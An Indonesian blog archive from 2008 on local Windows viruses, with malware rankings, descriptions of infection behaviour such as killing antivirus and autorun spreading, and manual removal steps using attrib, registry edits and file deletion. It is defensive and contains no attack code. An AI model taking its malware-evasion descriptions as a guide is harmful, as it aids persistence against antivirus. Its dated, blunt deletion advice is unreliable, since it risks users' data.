Tampilkan postingan dengan label Virus. Tampilkan semua postingan
Tampilkan postingan dengan label Virus. Tampilkan semua postingan

Kamis, 10 Juli 2008

Daftar Virus Lokal dengan Aksi Paling Ganas


Ilustrasi (ist.)

Jakarta - Virus-virus lokal banyak bermunculan, dan dibuat dengan bahasa pemrograman Visual Basic.

Spesialis antivirus dari perusahaan PT Vaksincom Alfons Tanujaya menilai, para pembuat virus cukup kreatif dengan membuat terobosan-terobosan yang mampu menutupi kelemahan virus yang dibuat dengan Visual Basic.

Berdasarkan data dari PT Vaksincom, berikut adalah daftar virus lokal dengan aksi paling ganas pada kuartal pertama tahun 2007:

- Babon, 49 KB, mengubah properties dan AM/PM pada jam menjadi tulisan Babon.

- Aksika (4k51k4), 45 KB, membuat backup MSVBVM60.DLL. disable System Restore, aktif di normal mode, Safemode dan Safemode with Command Prompt.

- Coolface, 78 KB, virus Bangka yang ditulis dalam bahasa C++ dan berusaha membasmi semua virus Visual Basic dengan menghapus file MSVBVM60.DLL.

- KillAV, 22 KB, menyembunyikan semua file MS word dan mengganti dengan dirinya.

- Pendekar Blank, 34 KB, menyembunyikan folder C:\Windows\System32 dan membuat file duplikat sesuai dengan nama folder yang disembunyikan [system32.exe], membackup MSVBVM60.dll di C:\WINDOWS\system32\dllChache, manipulasi file .com dan .txt sehingga setiap kali dijalankan akan menjalankan virus.

- Pacaran, 59 KB, mengubah ikon file "non virus" (MP3, txt, reg file, jpeg, inf dan exe) di komputer korban menjadi folder dan tipe file application sehingga pengguna komputer mengira itu adalah virus dan menghapusnya. Aksi lainnya virus ini memanipulasi Host file, menyembunyikan drive dan folder, mengubah tipe file "File Folder", MP3, JPEG menjadi W32.Pacaran.

- Blue Fantasy, 40 KB, otomatis menginfeksi dari Flash Disk, menyembunyikan folder dan menggantikan dengan file virus duplikat dengan ikon folder.

Lebih lanjut Alfons mengungkap, virus-virus yang dibuat dengan bahasa pemrograman Visual Basic memiliki beberapa ciri khas dan kelemahan sehingga "relatif" lebih mudah dibasmi. Pembasmian akan lebih mudah jika kita mampu mengakses file utama yang diperlukan untuk menjalankan Visual Basic, yaitu MSVBVM60.DLL.

Tetapi keterbatasan ini tidak menjadikan virus lokal yang dibuat kehilangan "kesaktiannya", karena beberapa pembuat virus menyadari kelemahan bahasa Visual Basic ini.

Pembuat virus berusaha menutupi kelemahan yang ada dengan melakukan backup file MSVBVM60.DLL pada direktori lain, dan akan melakukan loading secara otomatis jika MSVBVM60.DLL dihapus.

Para programmer yang menguasai bahasa pemrograman lain menggunakan kelemahan ini untuk menyerang virus-virus yang dibuat dengan Visual Basic, yaitu dengan menghapus file MSVBVM60.DLL dalam aksinya dan menulis virusnya dalam bahasa seperti C++.

Minggu, 06 Juli 2008

Top 10 Virus, Juni 2008

Virus lokal urutan pertama masih ditempati oleh Amburadul. Sementara di posisi kedua dan ketiga hanya terjadi pertukaran tempat antara virus Bluevhentexi dan Euis. Memang pada periode ini dirasakan tingkat penyebaran virus jenis VBScript sudah mulai menurun, terbukti hanya satu virus VBScript saja yang masuk dalam 10 besar virus kali ini. Berikut daftar selengkapnya:

1. Amburadul
Virus yang hadir dengan lambang menyerupai icon default untuk file gambar ini, akan membuat direktori baru untuk menaruh file - file induknya dengan nama ~A~m~B~u~R~a~D~u~L~² yang berada di bawah direktori System32 Windows. Nama file induk virus juga dibuat menyerupai file system Windows seperti csrss.exe, lsass.exe, winlogon.exe dan lain sebagainya. Dalam aksinya, ia akan membuat file duplikat atas dirinya pada root drive, misalnya dengan nama Friendster Community.exe, J3MbataN K4HaYan.exe, MyImages.exe, dan banyak nama file lainnya terutama yang berbau pornografi untuk menarik perhatian user. Untuk memberitahu kehadirannya, virus ini pun akan menampilkan pesannya pada caption di Internet Explorer. Dan hati-hati, karena ia dapat menghapus file gambar dan video yang Anda miliki. Beberapa extension file yang terbukti ia hapus adalah TIF, AVI, MP4, WMV, MPG, MPEG, VBS, dan EML.

2. Blueventhexi
Virus lokal yang satu ini memiliki ukuran file sebesar 36.864 bytes, tanpa di-packing. Dibuat menggunakan Visual Basic, dan menggunakan icon yang mirip seperti icon folder standar bawaan Windows. Sekilas, virus ini ada kesamaan dengan virus BlueFantasy. Pada komputer terinfeksi, Windows akan menampilkan pesan dari sang virus saat memulai Windows. Pesan tersebut juga bisa Anda temukan pada folder StartUp dengan nama “BluVenTheXi 10 Mei 2008 Surabaya.txt”.

3. Euis
Virus yang di-compilecompress. Pada komputer terinfeksi, virus ini akan menampilkan pesannya di awal. Ia juga akan menghilangkan beberapa menu dari Start Menu, memblokir akses ke beberapa tools Windows seperti Task Manager, Regedit, Folder Options, dan juga mencoba untuk menyingkirkan antivirus yang kemungkinan terpasang di komputer korban. Diketahui, virus ini pun dapat menginfeksi file executable lainnya dengan cara menaruh file yang diinfeksi di bawah tubuhnya. menggunakan Visual Basic ini memiliki ukuran file yang terbilang sangat besar, yakni sekitar 3,4Mb tanpa di-

4. Ninta
Virus lokal yang menggunakan icon mirip file aplikasi Microsoft Word ini dibuat menggunakan Visual Basic. Ia memiliki ukuran tubuh sekitar 53.248 bytes tanpa di-packer. Saat komputer terinfeksi oleh virus ini, pada direktori System32 akan terdapat sebuah direktori baru lagi dengan nama F41 yang sebenarnya ber-attribut hidden. Pada direktori tersebut akan terdapat 2 buah file, yang pertama svchost.exe yang tak lain merupakan file induk virus, dan satu lagi adalah file MSVBVM60.dll. Kedua file ini juga dengan attribut hidden. Ia juga akan mencoba membuat file autorun.inf dan explorer.exe di setiap drive dan akan mem-blok akses ke Command Prompt, Find/Search, dan beberapa aplikasi lainnya yang memiliki caption seperti Process Viewer.

5. Scootr

Virus ini dibuat menggunakan Visual Basic dengan icon menyerupai gambar folder. Ia memiliki ukuran file sebesar 159.744 tanpa di-compress. Jika dilihat sekilas ada beberapa kemiripan dengan virus Aksika, kemungkinan memang varian atau hasil modifikasi. Pada komputer terinfeksi, pada root directory akan terdapat file Puisi.txt yang merupakan pesan dari si pembuat virus. Jika PCMAV tidak bisa running sebagaimana mestinya, coba rename terlebih dahulu filenya agar tidak di-blok oleh virusnya.

6. Quick
Virus berlambangkan mirip file video ini memiliki ukuran tubuh yang cukup kecil, yakni 19.456 bytes, dalam keadaan terkompresi menggunakan UPX. Pada komputer terinfeksi, di root drive system (C:) akan terdapat file induk virus dengan nama seperti ccinfo.exe, readme.txt, version.sys, windriver.exe, stba_cihampelas.3gp.exe, 3gp.sys, dan masih banyak lagi yang lainnya.

7. Valeria
Virus yang dibuat menggunakan Visual Basic ini berukuran 143.360 bytes, murni tanpa di-compress. Virus yang dikenal menggunakan icon mirip folder ini terkadang menampakan iconnya pada system tray Windows. Pada komputer terinfeksi, akan terdapat file Msoffice.exe di folder StartUp yang ada di Start Menu.

8. Gen.FFE
Gen.FFE atau pembuatnya menamakan Fast Firus Engine merupakan salah satu program Virus Generator buatan lokal. Dengan hanya menggunakan program ini, tidak dibutuhkan waktu lama untuk dapat menciptakan virus/varian baru. Virus hasil keluaran program ini menggunakan icon mirip gambar folder standar bawaan Windows. Ia pun akan memblokir akses ke Task Manager, Command Prompt, serta menghilangkan beberapa menu di Start Menu. Ia juga akan membaca caption dari program yang aktif, apabila terdapat string yang berhubungan dengan antivirus maka program tersebut akan segera ditutup olehnya.

9. Joniezz
Virus berlambang mirip file dokumen Microsoft Word ini dibuat menggunakan Visual Basic. File induknya yang memiliki ukuran sebesar akan terdapat di direktori \System32\LoLOxz dengan nama smss.exe. Ia akan mencoba mengubah Registry dengan menonaktifkan fungsi Find/Search Windows serta Command Prompt. Ia juga akan membaca setiap program yang berjalan, apabila ditemukan program yang mengancam kelangsungan hidupnya seperi misalnya Process Explorer, maka akan segera ia bunuh. Ia pun tidak lupa membuat file autorun.inf pada beberapa drive agar mempermudahnya aktif dan menyebarkan diri.

10. Novi.vbs
Virus lokal jenis VBScript ini memiliki ukuran file sebesar 3698 bytes. Jika flash disk Anda terinfeksi, maka akan terdapat file NOVI.dll.vbs dan autorun.inf di root flash disk tersebut. Dan ia pun menampakan kehadirannya melalui caption Internet Explorer yang bertuliskan “Hacked by Novi PW”.

Sabtu, 05 Juli 2008

Basmi Brontox dengan Mudah

Gejala komputer anda terinfeksi virus Varian Brontok atau Pendekar Blank :
Windows ter’close
Komputer tiba-tiba restart
Keluar pesan berupa file text(notepad) atau html(iexplorer)
File yang di create virus pendekar blank :
AUT0EXEC.BAT (harusnya autoexec), di c:\
M5VBVM60.EXE (harusnya msvbvm) di c:\windows\system32
Regedit32.com (harusnya regedit32.exe), di c:\windows\system32
Shell32.com. (harusnya ini memang gak ada) di c:\windows\system32
dllchache.exe (harusnya gak ada) di c:\windows\system32
Selain menutup windows-windows yang sedang kita pakai, menyembunyikan folder, virus pendekar blank juga mengirim pesan di
file
c:\(Read Me)Pendekar Blank.txt
Salam Kenal Buat User yang sedang Aktif di Komputer ini
Saya adalah Pendekar Blank 1, Program yang dibuat oleh seseorang yang ingin
memberantas kejahatan di muka bumi ini dan saya dikirim ke sini untuk:
1. Mencoba memberantas virus-virus lokal yang sudah menyebar di Indonesia
2. Mencoba mengamankan komputer ini dari infeksi virus lokal, dan
3. Mencoba menghalangi anda untuk berbuat sesuatu yang tidak perlu dilakukan di komputer ini
Itulah 3 Misi saya setelah dikirim ke komputer ini
Mohon maaf apabila nantinya terdapat kesalahan-kesalahan selama melakukan 3 misi diatas
Mudah-mudahan anda adalah orang baik yang mempergunakan komputer pada jalan yang benar
Untuk menampilkan folder yang disembunyikan ketik di command prompt:
Misal di drive E :
attrib -R -H -S E:\*.* /S /D
(-) melepas atribut
(+) terapkan atribut
R : read only
H : hidden
S : file sistem
/S /D : folder dan seluruh sub folder
Untuk mengalahkan pendekar blank kita gunakan antivirus lokal seperti PCMAV (dari Majalah PC) atau ansav (http://www.ansav.com ), keduanya cukup ampuh untuk membasmi virus-virus lokal terbaru.

Virus Lokal basmi Virus Import?

Jakarta - Untuk memperbaiki versi sebelumnya, VBWorm.NA (yang juga dinamai virus Dago) menelurkan varian teranyarnya dengan spesifikasi yang hampir sama. Dengan antivirus Norman Virus Control, varian terbaru Dago terdeteksi dengan nama W32/KillAV.

"Sesuai dengan namanya, KillAV akan mencoba membasmi program antivirus dengan cara menghapus file yang berada pada instalasi antivirus itu sendiri, sehingga antivirus tersebut tidak dapat berfungsi dengan baik," kata Alfons Tanujaya, spesialis antivirus dari PT Vaksincom, seperti dikutip detikINET dari keterangan tertulisnya, Selasa (26/09/2006).

Alfons mengingatkan, hal ini sangat berbahaya karena tanpa perlindungan program antivirus yang memadai, komputer yang terhubung ke jaringan atau Internet sangat rentan terhadap serangan.

VBWorm.NA muncul pada pertengahan Juli 2006, dan disinyalir berasal dari kawasan terkenal di Bandung, Jawa Barat yaitu Dago. Dinamakan demikian, karena virus ini memunculkan string "dago dago dago dago" pada header browser.

Meski penyebarannya tidak seluas Rontokbro atau Moonlight, perusahaan antivirus PT Vaksincom mengatakan virus Dago telah menginfeksi ratusan komputer di Indonesia.

Dalam versi barunya, Dago yang kemudian dikenal sebagai KillAV, menandai aksi infeksinya dengan munculnya string "Kata Mutiara" setiap kali komputer booting. Virus ini juga menandai aksinya dengan menampilkan gambar bunga mawar ketika membuka browser Internet Explorer.

Aksi KillAV juga ditandai dengan menyisipkan setangkai bunga mawar pada tabulasi "General" pada System Properties komputer yang terinfeksi. Dan yang menjadi ciri pamungkasnya adalah melumpuhkan fungsi program antivirus yang terinstal.

Untuk mengelabui pengguna komputer, KillAV juga akan memanipulasi setiap file yang sudah terinfeksi dengan menggunakan ikon "Folder" berukuran 57 KB, memakai ekstensi .EXE dengan tipe file "Application".

Dijelaskan Alfons, seperti pendahulunya KillAV dibuat dengan menggunakan Bahasa VB (Visual Basic). Jika biasanya virus yang dibuat dengan VB relatif lebih mudah dihentikan aksinya -- yaitu dengan cara merubah nama file MSVBVM60.dll yang terletak pada direktori [C:\Windows\System32] -- maka tidak demikian dengan KillAV ini.

Untuk berjaga-jaga agar KillAV dapat tetap aktif walaupun file MSVBVM60.dll tersebut diubah atau dihapus, ia akan membuat file yang sama [msvbvm60.dll] pada direktori C:\WINDOWS\system32\5810, demikian penjelasan Alfons.

Basmi Antivirus

"Jika sebelumnya virus lokal hanya menghentikan proses antivirus, kini VBWorm.NA benar-benar akan menghancurkan program antivirus tersebut sampai ke akar-akarnya, dengan cara menghapus file pendukung antivirus tersebut (khususnya file eksekusi)," papar Alfons.

Virus ini membasmi program antivirus tertentu diantaranya: Norman Virus Control, McAffe, Symantec, ESET, Antivir, Norton, AVG, Kaspersky, Panda Antivirus, PCCilin.

Selain dengan update terbaru antivirus, upaya pembersihan KillAV dapat dilakukan dengan cara manual, yaitu dengan mematikan proses virus yang sedang aktif di memori; lalu menghapus string yang dibuat oleh virus; menghapus file induk dan file duplikat yang dibuat oleh KillAV; dan menginstal kembali program antivirus yang terinstal sebelumnya, karena bisa jadi KillAV berhasil membasmi program antivirus tersebut. ( nks / nks )

Virus Lokal? g masalah!!!

Dewasa ini perkembangan virus lokal telah menjadi masalah tersendiri bagi pelaku TI didalam negeri, dan telah banyak memakan korban. Biasanya program virus lokal memiliki ciri-ciri umum yang hampir sama yaitu menyamarkan dirinya dengan icon folder, menduplikasi diri secara massal ke flashdisk, dan mengaktifkan dirinya lebih dari satu process pada komputer yang menjadi korban, serta melakukan blokir terhadap beberapa fungsi system yang memiliki potensi untuk menghapus virus seperti task manager, cmd, registry editor dan beberapa antivirus.

Jika dilihat dari ciri-ciri tersebut, maka dengan mudah kita dapat mengetahui apakah system kita telah terinfeksi atau belum, misalnya tiba-tiba pada flashdisk bermunculan berbagai file exe dengan icon folder.

Berbagai teknik penanganan virus lokal telah direlease oleh situs ataupun majalah komputer (menggunakan tools seperti hijackthis, pexplorer, dll), dan tetap saja sulit diikuti (bahkan oleh pelaku IT yang sudah berpengalaman), karena virus lokal secara aktif akan mematikan fungsi system sebagaimana yang dijelaskan sebelumnya (pada beberapa virus secara otomatis akan mengenali process program-program utility tersebut dan mematikan process program begitu tools tersebut diaktifkan).

Bagaimana solusi dengan Antivirus komersil ? Rasanya cukup membantu, tetapi untuk virus-virus yang sudah tersedia patternnya, bagaimana dengan virus baru ? Begitu system anda terinfeksi, dan program antivirus yang ada pasti tidak berkutik, karena virus secara aktif akan mematikan process antivirus, sehingga tidak memungkinkan kita untuk mengupdate program antivirus dengan definisi yang terbaru.

Apa yang harus saya lakukan jika system saya telah terinfeksi

Jika anda mengetahui system anda terinfeksi, merupakan awal dari solusi yang akan saya tawarkan, ikuti saja langkah berikut ini :

  1. Masukkan flashdisk anda
  2. Catat file-file yang bertambah, ataupun amati file-file apa saja yang memiliki icon folder tetapi memiliki extension exe (ada beberapa virus menggunakan icon MSWord dan ACDSee).
  3. Download file IndoprogMagicAv dari forum diskusi indoprog, dan unzip ke folder c:\indoprog
  4. Jalankan a.bat dari folder c:\indoprog
  5. Klik pada load pattern virus, dan buka file virus yang telah anda dapatkan pada langkah 2
  6. Klik pada scan.

Jumat, 04 Juli 2008

Recovery file system yang hilang/rusak

Jika pernah mengalami file sistem windows (seperti *.dll dan *.sys) yang rusak (corrupt) atau hilang, sehingga windows tidak bisa booting ( hanya menampilkan pesan bahwa file xx.dll was mising or corrupt ), maka coba ikuti langkah berikut :

  1. Restart komputer dari Windows Setup Floppy disk atau dengan Windows Installation CD-nya
  2. Ketika tampil “Welcome to Setup” Screen tekan F10 atau tekan R ( Pengguna Windows 2000 harus menekan F10 atau R kemudian C).
  3. Ketika ditampilkan daftar installasi dan text “Which Windows Installation would you like to log on to?”, pilih nomor yang cocok sesuai dengan Instalasi Windows yang ingin di repair
  4. Tulis Password Administrator dan tekan Enter. Jika tidak ada passwordnya, langsung tekan enter
  5. Dari tampilan yang muncul, ketik perintah seperti berikut :
    expand D:\i386\xx.dll C:\dir_target
    Dimana xx.dll merupakan nama file yang rusak/hilang yang ingin di recovery, D: merupakan Drive letter untuk CD-ROM dan dir_target merupakan direktory target, kemudian tekan enter.
  6. Sesudah itu ketik exit, untuk keluar kemudian keluarkan CD-nya dan Restart komputer

Menghapus Virus Lokal Secara Manual

Menghadapi serangan berbagai macam virus komputer – dengan OS Microsoft Windows tentu saja – kebanyakan orang akan memikirkan bagaimana mendapatkan antivirus terbaru dan antivirus khusus untuk virus lokal tertentu karena kebanyakan software antivirus tidak mampu mendeteksinya. Berbeda dengan cara pikir yang sangat umum ini, saya menawarkan solusi alternatif menghadapi virus lokal yaitu membasminya secara manual.

Virus adalah program/aplikasi (=serangkaian perintah) yang mampu memperbanyak diri. Kebanyakan programer membuat virus-virus ini sebagai serangkaian perintah yang menyusup ke dalam barisan perintah-perintah dalam aplikasi-aplikasi lain. Virus-virus tertentu bahkan diprogram mampu menyelinap dalam master boot record ataupun sektor-sektor tertentu dalam disk dengan perlindungan khusus tanpa bisa dikenali pengguna sebagai file. Sayangnya pekerjaan cerdik ini tidak berlaku untuk kebanyakan virus lokal yang keberadaannya sangat mencolok dan mengundang permusuhan.

Berdasarkan titik lemah inilah kita dapat membasmi virus lokal secara manual. Ada dua acuan umum dalam membasmi virus secara manual yaitu menghentikan running virus dan melenyapkan virus-virus. Berdasarkan dua acuan ini anda dapat mengembangkan sendiri strategi anda tergantung kasus yang anda hadapi.

Bagian I: Menghentikan Running Virus

Untuk serangan virus yang dibuat dengan Visual Basic (VB) – untungnya kebanyakan virus lokal dibuat dengan VB – anda dapat menghentikan running virus dengan cara ‘menyingkirkan’ msvbvm50.dll dan msvbvm60.dll yang berada dalam direktori c:windowssystem32 yang merupakan virtual machine dari program-program yang dibuat dengan VB. Adapun istilah ‘menyingkirkan’ bisa diwujudkan dengan berbagai cara tergantung keadaan ataupun selera, yaitu dihapus (tidak dianjurkan), dipindah ke folder lain, atau diganti dengan nama lain. Selain itu caranya bisa dilakukan dengan berbagai cara tergantung dari tingkat serangan virus mulai dari menggunakan windows explorer, command prompt emulator pada windows (ketika virus menonaktifkan windows explorer), ataupun harus menjalankan windows dalam mode ‘save mode with command prompt only’ dengan menekan F8 pada awal windows startup untuk menampilkan startup menu. Jika virus masih tetap berjalan, berarti virus tidak dibuat dengan VB dan untuk menjalankan langkah selanjutnya anda harus menggunakan Linux atau OS lain yang tidak terpasang emulator untuk program-program windows.

Bagian II: Menghapus Virus-virus

Untuk melenyapkan virus-virus yang harus anda lakukan adalah mengumpulkan semua file aplikasi melalui find dengan entri nama *.exe, mengidentifikasi aplikasi-aplikasi yang merupakan virus, dan menghapus mereka. Jika menu find telah dinonaktifkan oleh virus, anda bisa memanggilnuya dengan menekan F3 (jauh lebih mudah daripada harus mengedit registry editor). Memvonis aplikasi sebagai virus sangat tergantung dari pengalaman dan insting anda, karena ciri-cirinya bisa sangat bervariasi; tetapi yang harus menjadi acuan adalah bahwa anda mencari hal-hal ‘tidak seperti yang semestinya dan berada di tempat semestinya’ atau terkesan disembunyikan. Aplikasi-aplikasi dengan icon Microsoft word Document atau icon folder bisa langsung divonis sebagai virus, tetapi aplikasi dengan ikon biasa pun harus anda curigai jika anda yakin siapapun tidak pernah memindahkannya ke sana. Untuk memperkecil ruang lingkup, anda juga perlu memperhatikan ukuran file karena banyak virus yang masing-masing mempunyai ukuran file sama.

Aplikasi yang telah anda vonis sebagai virus harus dihapus langsung dengan menekan sift+delete. Sebelumnya, pastikan semua data telah anda selamatkan dengan mengkopi isi dokumen dan di-paste di tempat lain dalam keadaan virus tidak runnig. Selamat beraksi.

Kamis, 03 Juli 2008

Rontokbro menyerbu Indonesia

Siapa bilang putra Indonesia tidak mampu bersaing dan berkiprah di dunia ? Lihat Teh Botol Sosro, Gudang Garam, Indomie dan Pacekap yang dimiliki oleh putra Indonesia yang menguasai pasar Indonesia dan mulai merambah pasar dunia. Kalau selama ini virus lokal seperti Kangen, Tabaru (Riyani Jangkaru), Lavist atau Kumis yang asli buatan Indonesia dapat digolongkan sebagai virus "kelas 2" karena penyebarannya mengandalkan UFD (USB Flash Disk) meminjam istilah yang digunakan Tabloid PC Plus :) dan mayoritas menyebar di Indonesia atau Asia Tenggara. Maka kini para pengguna internet Indonesia dan di belahan dunia lain seperti Amerika, Polandia, Spanyol, Jepang, Vietnam, Belanda, Hungaria, Swedia, Peru, Rusia dan Israel juga kebagian aksi virus baru yang diberi nama W32/Rontokbro@mm, sesuai dengan namanya maka anda tahu bahwa virus ini mampu menyebarkan dirinya dengan mass mailing (email massal) dan memupuskan "tradisi" virus lokal yang mengandalkan UFD sebagai sarana penyebaran utamanya. Banyak hal yang mengejutkan dari Rontokbro ini seperti kemampuan rekayasa sosial yang tinggi dan dapat dikatakan berciri asli Indonesia dan pertama kali digunakan oleh virus lokal seperti memalsukan "icon" dirinya sebagai file tidak berdosa baik sebagai file MS Office ataupun sebagai folder, melakukan bloking akses Registry Editor, melakukan restart komputer jika menemukan kata tertentu pada header browser, selektif dalam mengirim email bervirus (guna menghindari deteksi cepat oleh vendor sekuriti) sampai "mengerjai" Host file komputer lokal sehingga akses ke situs sekutiri tertentu menjadi terblokir.

Mengapa Rontokbro

Tentunya anda bertanya, kok namanya susah amat Rontokbro ? Apa maksudnya mengakibatkan komputernya si Bro Rontok ? :). Atau apa alasan lain ? Menurut pengamatan teknisi laboratorium virus Vaksincom, ternyata pembuat virus ini mendapatkan ilham membuat virus ini dari satwa langka Indonesia, Elang Brontok yang memiliki nama latin Spizaetus cirrhatus, selain itu rupanya pembuat virus Rontokbro (yang disinyalir berasal dari salah satu universitas pemerintah di Jawa Barat) juga menyebarkan pesan anti korupsi, anti freesex dan anti pencemaran lingkungan dalam email yang dikirimkannya dengan lampiran kangen.exe. Apakah pembuat virus ini sama dengan pembuat Kangen, atau ia hanya membonceng kepopuleran virus Kangen agar dirinya dapat menyebar dengan baik, yang jelas menurut statistik Vaksincom penyebaran Rontokbro saat ini sudah mengalahkan Kangen. Gara-gara Rontokbro ini juga Vaksincom jadi mau tidak mau mencari sedikit informasi tentang Elang Brontok yang ternyata merupakan satwa burung khas Indonesia yang patut dibanggakan karena memiliki keunikan morphologi yang tidak dimiliki burung lainnya di dunia. Terimakasih kepada bung Thomas Feri atas sharing informasinya dan kesediaannya mengizinkan Vaksincom menampilkan gambar Elang Brontok Spizaetus cirrhatus limnaetus dibawah ini.

Rabu, 02 Juli 2008

Virus Lokal melemah Virus Impor Mengganas

Saat ini perkembangan malware ternyata berubah-ubah dengan cepat. Lihat saja, di Indonesia sendiri serangan virus-virus lokal semakin menurun, mungkin karena para vxer domestik sudah mulai jenuh dan kehabisan trik untuk mengembangkan kemampuan malcodingnya. humm... ada apa gerangan dengan para vxer?

Keadaan ini ternyata berbanding terbalik dengan virus-virus import, dimana frekuensi serangannya semakin lama semakin meningkat dari waktu-kewaktu. Bahkan seakan menjadi trend bisnis kotor saat ini, malcoding memiliki peluang bisnis yang lebih besar dan lebih menggiurkan dibandingkan dengan kerjaan rutinitas para programmer professional dikantornya, demikian seperti yang dikutip detikinet.com. Sehingga saat ini banyak para programmer professional yang mulai berlaih ke aktifitas malcoding, dimana malcoding sudah bukan hanya sekedar simbol untuk mengatakan "inilah kemampuanku dalam membuat virus" tetapi telah berubah menjadi "inilah cara termudah ku dalam mencari uang". Malcoding bukanlah menjadi mainan para vxer amatir lagi saat ini, tetapi diperkirakan sudah banyak programmer dengan pendanaan yang kuat dan SDM yang mumpuni mulai mempraktekan malcoding.

Perushaan-perusahaan besar sudah mulai menggunakan cara kotor ini untuk melumpuhkan rival bisnisnya. Dan bahkan mereka rela menyewa vxer, hacker dan cracker untuk melumpuhkan lawan bisnisnya.

Kita yang berada di Indonesia masih bisa bernafas lega, karena semua itu baru terjadi di luar sana, semoga perkembangan malware di indonesia akan terus turun seperti yang sedang terjadi saat ini. let's down.. :)

Daftar Virus Lokal dengan Serangannya yang Paling Ganas

Virus-virus lokal banyak bermunculan, dan dibuat dengan bahasa pemrograman Visual Basic.

Spesialis antivirus dari perusahaan PT Vaksincom Alfons Tanujaya menilai, para pembuat virus cukup kreatif dengan membuat terobosan-terobosan yang mampu menutupi kelemahan virus yang dibuat dengan Visual Basic.

Berdasarkan data dari PT Vaksincom, berikut adalah daftar virus lokal dengan aksi paling ganas pada kuartal pertama tahun 2007:

- Babon, 49 KB, mengubah properties dan AM/PM pada jam menjadi tulisan Babon.

- Aksika (4k51k4), 45 KB, membuat backup MSVBVM60.DLL. disable System Restore, aktif di normal mode, Safemode dan Safemode with Command Prompt.

- Coolface, 78 KB, virus Bangka yang ditulis dalam bahasa C++ dan berusaha membasmi semua virus Visual Basic dengan menghapus file MSVBVM60.DLL.

- KillAV, 22 KB, menyembunyikan semua file MS word dan mengganti dengan dirinya.

- Pendekar Blank, 34 KB, menyembunyikan folder C:\Windows\System32 dan membuat file duplikat sesuai dengan nama folder yang disembunyikan [system32.exe], membackup MSVBVM60.dll di C:\WINDOWS\system32\dllChache, manipulasi file .com dan .txt sehingga setiap kali dijalankan akan menjalankan virus.

- Pacaran, 59 KB, mengubah ikon file "non virus" (MP3, txt, reg file, jpeg, inf dan exe) di komputer korban menjadi folder dan tipe file application sehingga pengguna komputer mengira itu adalah virus dan menghapusnya. Aksi lainnya virus ini memanipulasi Host file, menyembunyikan drive dan folder, mengubah tipe file "File Folder", MP3, JPEG menjadi W32.Pacaran.

- Blue Fantasy, 40 KB, otomatis menginfeksi dari Flash Disk, menyembunyikan folder dan menggantikan dengan file virus duplikat dengan ikon folder.

Lebih lanjut Alfons mengungkap, virus-virus yang dibuat dengan bahasa pemrograman Visual Basic memiliki beberapa ciri khas dan kelemahan sehingga "relatif" lebih mudah dibasmi. Pembasmian akan lebih mudah jika kita mampu mengakses file utama yang diperlukan untuk menjalankan Visual Basic, yaitu MSVBVM60.DLL.

Tetapi keterbatasan ini tidak menjadikan virus lokal yang dibuat kehilangan "kesaktiannya", karena beberapa pembuat virus menyadari kelemahan bahasa Visual Basic ini.

Pembuat virus berusaha menutupi kelemahan yang ada dengan melakukan backup file MSVBVM60.DLL pada direktori lain, dan akan melakukan loading secara otomatis jika MSVBVM60.DLL dihapus.

Para programmer yang menguasai bahasa pemrograman lain menggunakan kelemahan ini untuk menyerang virus-virus yang dibuat dengan Visual Basic, yaitu dengan menghapus file MSVBVM60.DLL dalam aksinya dan menulis virusnya dalam bahasa seperti C++.

Selasa, 01 Juli 2008

Virus .scr, 32 kb, proses: emangeloh.exe

barusan komputer kantor tetangga kena virus beginian, nih
g kasih tau caranya...(ini virus varian dari yang 42 kb)

1. untuk ngilangin proses virus:
a. download process explorer (www.sysinternals.com)
b. boot ke safe mode
c. jalanin process explorer
d. hapus proses yg namanya "emangeloh.exe"
tips: kalo emangeloh.exe dihapus, bakalan muncul2 lagi
jadi, hapus proses diatas emangeloh.exe. kalo di
komputer g ky gini:
-services
-winlogon
-emangeloh.exe
g hapus proses services (ini bukan proses windows,
tapi ditiru sama virus varian ini, winlogon juga)
oya, cara hapusnya: klik kanan di proses services,
klik di end process tree
e. hapus semua file .scr dan .exe yang besarnya 32 kb
(di komputer g, nama filenya biasanya:
lagu ungu .exe atau
lagu ungu .scr
kalo folder lu diset single click, filenya keliatan
aneh, seperti:
lagu_ungu__________________________.exe
hapus aja

2. untuk ngembaliin regedit:
a. rename regedit.exe jadi reg.exe
b. jalankan reg.exe (akan kebuka regedit)
c. hapus key ini:
hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe

selesai... :)

untuk antivirus...g gak suka sama yang
namanya antivirus....g sendiri pake linux...tapi untuk
temen2 g, g saranin kaspersky...

antivirus antivir bagus, tapi terlalu lambat...bikin
komputer serasa hang...

Virus w32.babon@m3nt0z pemakan file .exe

Semakin…semakin aja virus virus bermunculan di cyber indonesia…walopun kecil2 tapi agak menjengkelkan jugak yah…kali ini buatan anak sampit, yaitu virus babon … kok babon???iya lah…namanya virus ya bebaslah…mau babon, babin, nyemot…. Yang penting bisa menghajar komputer …. Nah coba lihat ciri2 yang terkena virus ini …

Code name: w32.babon@m3nt0z
CRC32 : banyak sekali ... kayaknya emang udah berkembang ni virus
Ukuran : 91,4 kb atau 92 kb

Pertama kali ngeliat file bernama cewek_imoet pasti jantung anda berdegup kencang (DUG DUG DUG DUG)...emang bunyi bedug..!!!!! lalu anda mempunyai hasrat untuk membuka file tersebut.....huihihihihi!!!STOP STOP...(sambil mencegah pembaca untk mengklik 2 kali mouse-nya) …lihat dulu men… ekstensinya apa…kalau 3gp, avi atau jpg boleh lah dibukak…tapi kalo exe…ntar dulu…nah ini yang biasanya kurang diperhatikan oleh user – user…hati2 nama file boleh menarik tapi ekstensi file (nama belakang file seperti .com, .exe, .bat, .dll) bisa – bisa menjebak…jadi waspadalah – waspadalah!!!!, karena file cewek_imoet adalah file pemicu virus w32.babon@m3nt0z.

Ciri2 yang telah terkena virus ini:
1. Menu shutdown hilang
2. Registry di blok
3. Folder Options di windows explorer menghilang
4. msconfig diblok
5. File word berekstensi .doc yang asli disembunyikan dan dirubah menjadi file berekstensi .exe mempunyai icon folder berwarna kuning dan berukuran 91,4 kb
6. Seluruh file .exe disembunyikan atau bahkan dihapus dan diganti dengan file virus berekstensi .exe dan mempunyai icon berwarna kuning berukuran 91, 4 kb (ngeri’nyakkkkk!!!!!)
7. My computer menjadi Babon
8. Recycle Bin menjadi Babon suka kebersihan
9. Menu run, search, documents dan lain lain hilang
10. My Documents anda menjadi File_Rahasia THE HUNTER


FILE PEMICU VIRUS
- Cewek_Imoet.exe, mempunyai icon folder berwarna kuning yang ada di tiap drive C:, D:, E: dan lain – lain
- File_Rahasia THE HUNTER.exe , mempunyai icon folder berwarna kuning yang ada di tiap drive C:, D:, E: dan lain – lain
